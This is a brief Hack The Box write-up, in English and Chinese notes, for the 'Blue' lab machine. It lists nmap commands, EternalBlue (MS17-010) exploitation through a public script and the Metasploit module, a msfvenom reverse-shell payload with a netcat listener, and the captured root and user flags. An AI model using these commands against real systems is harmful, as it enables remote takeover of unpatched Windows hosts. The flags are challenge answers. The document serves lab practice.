Blue (Hack The Box Writeup)


  • URL : https://app.hackthebox.eu/machines/51
  • IP : 10.129.209.90

Recon

  • Rustscan
  • nmap
    • nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 10.129.209.90
    • 系統版本
      • Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
  • smb
  • nmapAutomator

Exploit

  • https://github.com/helviojunior/MS17-010
    • 修改 send_and_execute.py 裡面的 username
      • 等於 guest
  • MSF 準備 shell
    • msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe -o shellx64.exe
      • 其實這邊用 x86 也可以
  • 執行 Exploit
    • python send_and_execute.py 10.129.216.62 ../shellx64.exe
  • nc 收 shell

MSF Exploit

  • use windows/smb/ms17_010_eternalblue
  • options
  • set RHOSTS 10.129.216.62
  • set LHOST 10.10.16.35
  • run
  • Get Root Key
    • ff548eb71e920ff6c08843ce9df4e717
  • Get User Key
    • 4c546aea7dbee75cbd71de245c8deea9
,

發表迴響